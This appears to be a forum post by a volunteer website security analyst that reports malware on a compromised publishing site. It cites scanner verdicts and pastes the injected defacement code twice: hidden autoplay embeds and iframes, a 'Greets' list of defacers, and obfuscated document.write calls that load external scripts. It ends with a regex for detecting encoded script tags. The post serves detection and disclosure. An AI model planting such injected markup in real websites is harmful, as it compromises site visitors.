See:
http://killmalware.com/1clickpublishing.com/Compromised website:
https://www.virustotal.com/nl/url/acb8909908fbec6918e2669675269b41cfce87ab1b506c3749fd70ab02ad19c8/analysis/Blacklisted by Yandex:
https://www.yandex.com/infected?url=1clickpublishing.com&l10n=en&redircnt=1442005785.1 ISSUE DETECTED DEFINITION INFECTED URL
Website Malware MW:IFRAME:HD202?v02 -http://1clickpublishing.com
Website Malware MW:JS:GEN2?web.js.script-injection.003 -http://1clickpublishing.com/404testpage4525d2fdc
Website Malware MW:IFRAME:HD202?v02 -http://1clickpublishing.com/404javascript.js
Known javascript malware. Details: -http://sucuri.net/malware/entry/MW:IFRAME:HD202?v02
<pre align="center"><b><EMBED SRC="-http://static.4shared.com/flash/player/5.6/player.swf?config=-http://static.4shared.com/flvplayer_facebook_embed_audio_config.xml&file=-http://mp3folder.biz/uploads/files/storage-18/2_1201135001.mp3" AUTOSTART="TRUE" LOOP="TRUE" WIDTH="0" HEIGHT="0" ALIGN="CENTER"></b></pre><footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #58FAF4; border-bottom: 1px solid #58FAF4"><font color=#ff0000 size=2 face="Tahoma"><font color="58FAF4">Greets~:</b></font><marquee scrollamount="5" scrolldelay="50" width="80%"><b> - SpeTr0x - Mester Feisty - AdGhost - ayoub001 - Dr.Xkiller - Marco_Nader -The_Punishier - Le Parrain - DRX.TN </b></marquee></font> <script type="text/javascript"> var loc = (("-https:" == document.location.protocol) ? "-https://analytics." : "
http://analytics."); document.write(unescape("%3Cscript src='" + loc + "sitewit.com/v3/750336666/sw.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var loc = (("https:" == document.location.protocol) ? "
https://analytics." : "-http://analytics."); document.write(unescape("%3Cscript src='" + loc + "-sitewit.com/v3/1365977375/sw.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var loc = (("-https:" == document.location.protocol) ? "
https://analytics." : "
http://analytics."); document.write(unescape("%3Cscript src='" + loc + "-sitewit.com/v3/750336666/sw.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var loc = (("https:" == document.location.protocol) ? "
https://analytics." : "-http://analytics."); document.write(unescape("%3Cscript src='" + loc + "-sitewit.com/v3/1365977375/sw.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> var loc = (("https:" == document.location.protocol) ? "-https://analytics." : "-http://analytics."); document.write(unescape("%3Cscript src='" + loc + "-sitewit.com/v3/1365977375/sw.js' type='text/javascript'%3E%3C/script%3E")); </script> </body></html><center><iframe width="1" height="1" src="-https://www.youtube.com/embed/czdmyW683rM?rel=0&autoplay=1&loop=1&playlist=roORpS_E-Do" frameborder="0" allowfullscreen></iframe></center><SCRIPT Language=VBScript><!--
<pre align="center"><b><EMBED SRC="-http://static.4shared.com/flash/player/5.6/player.swf?config=-http://static.4shared.com/flvplayer_facebook_embed_audio_config.xml&file=-http://mp3folder.biz/uploads/files/storage-18/2_1201135001.mp3" AUTOSTART="TRUE" LOOP="TRUE" WIDTH="0" HEIGHT="0" ALIGN="CENTER"></b></pre><footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:rgb(0,0,0); text-align:center; border-top: 1px solid #58FAF4; border-bottom: 1px solid #58FAF4"><font color=#ff0000 size=2 face="Tahoma"><font color="58FAF4">Greets~:</b></font><marquee scrollamount="5" scrolldelay="50" width="80%"><b> - SpeTr0x - Mester Feisty - AdGhost - ayoub001 - Dr.Xkiller - Marco_Nader -The_Punishier - Le Parrain - DRX.TN </b></marquee></font> <script type="text/javascript"> var loc = (("https:" == document.location.protocol) ? "
https://analytics." : "
http://analytics."); document.write(unescape("<script src='" + loc + "sitewit.com/v3/750336666/sw.js' type='text/javascript'></script>")); </script> <script type="text/javascript"> var loc = (("https:" == document.location.protocol) ? "
https://analytics." : "
http://analytics."); document.write(unescape("<script src='" + loc + "sitewit.com/v3/1365977375/sw.js' type='text/javascript'></script>")); </script> <script type="text/javascript"> var loc = (("https:" == document.location.protocol) ? "
https://analytics." : "
http://analytics."); document.write(unescape("<script src='" + loc + "sitewit.com/v3/750336666/sw.js' type='text/javascript'></script>")); </script> <script type="text/javascript"> var loc = (("https:" == document.location.protocol) ? "
https://analytics." : "
http://analytics."); document.write(unescape("<script src='" + loc + "sitewit.com/v3/1365977375/sw.js' type='text/javascript'></script>")); </script> <script type="text/javascript"> var loc = (("https:" == document.location.protocol) ? "
https://analytics." : "
http://analytics."); document.write(unescape("<script src='" + loc + "sitewit.com/v3/1365977375/sw.js' type='text/javascript'></script>")); </script> </body></html><center><iframe width="1" height="1" src="-https://www.youtube.com/embed/czdmyW683rM?rel=0&autoplay=1&loop=1&playlist=roORpS_E-Do" frameborder="0" allowfullscreen></iframe></center><SCRIPT Language=VBScript><!--
Website hacked:
http://toolbar.netcraft.com/site_report?url=http://1clickpublishing.comSee: -http://www.domxssscanner.com/scan?url=http%3A%2F%2F1clickpublishing.com
Not flagged by Avast. On the "%3Cscript" in the hacked code, read here:
http://stackoverflow.com/questions/13771238/3cscript-vs-script - regular expression pattern: /^<([a-z]+)([^<]+)*(?:>(.*)<\/\1>|\s+\/>)$/
Regular expression to detect tags //((\%3c)|<)((\%2F)|/)*
[a-z0-9 \%] + ((\%3E)|>)/ix
//((\%3c)|< will check for opening angle bracket or hex equivalent ('3C')
I treated that in musings and now we see where this had come in handy
Also issues here:
http://www.dnsinspect.com/1clickpublishing.com/1442006468polonus (volunteer website security analyst and website error-hunter)
